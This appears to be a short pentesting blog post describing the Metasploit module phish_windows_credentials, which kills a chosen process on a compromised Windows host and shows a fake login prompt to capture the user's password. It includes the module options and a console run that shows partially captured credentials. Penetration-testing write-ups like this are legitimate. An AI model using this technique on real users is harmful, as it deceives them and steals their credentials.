天天看點
傳回

Windows Gather User Credentials (phishing)

Description:

This module is able to perform a phishing attack on the target by

popping up a loginprompt. When the user fills credentials in the

loginprompt, the credentials will be sent to the attacker. The

module is able to monitor for new processes and popup a loginprompt

when a specific process is starting. Tested on Windows 7.

When notepad.exe is opened in target machine, there will be a login manager window. If you provide the right password, notepad window will appear, or it will continue until you hate it.

msf post(phish_windows_credentials) > show options 

Module options (post/windows/gather/phish_windows_credentials):

   Name         Current Setting                                                                Required  Description
   ----         ---------------                                                                --------  -----------
   DESCRIPTION  {PROCESS_NAME} needs your permissions to start. Please enter user credentials  yes       Message shown in the loginprompt
   PROCESS                                                                                     no        Prompt if a specific process is started by the target. (e.g. calc.exe or specify * for all processes)
   SESSION                                                                                     yes       The session to run this module on.

msf post(phish_windows_credentials) > set SESSION 
SESSION => 
msf post(phish_windows_credentials) > set PROCESS notepad.exe
PROCESS => notepad.exe
msf post(phish_windows_credentials) > run

[+] PowerShell is installed.
[*] Monitoring new processes.
[*] notepad.exe is already running. Waiting on new instances to start
[*] notepad.exe is already running. Waiting on new instances to start
[*] notepad.exe is already running. Waiting on new instances to start
[*] New process detected:  notepad.exe
[*] Killing the process and starting the popup script. Waiting on the user to fill in his credentials...
[+] #< CLIXML

[+] 

[+] UserName                   Domain                     Password                 
--------                   ------                     --------                 
nfs                        nfs-

[1].https://forsec.nl/2015/02/windows-credentials-phishing-using-metasploit/

[2].https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/phish_windows_credentials.rb

[3].https://github.com/rapid7/metasploit-framework/blob/master/data/post/powershell/Invoke-LoginPrompt.ps1

Pentesting
上一篇: Oracle Attack Methodology
下一篇: REDIS - Export File / Read File / Cracker

繼續閱讀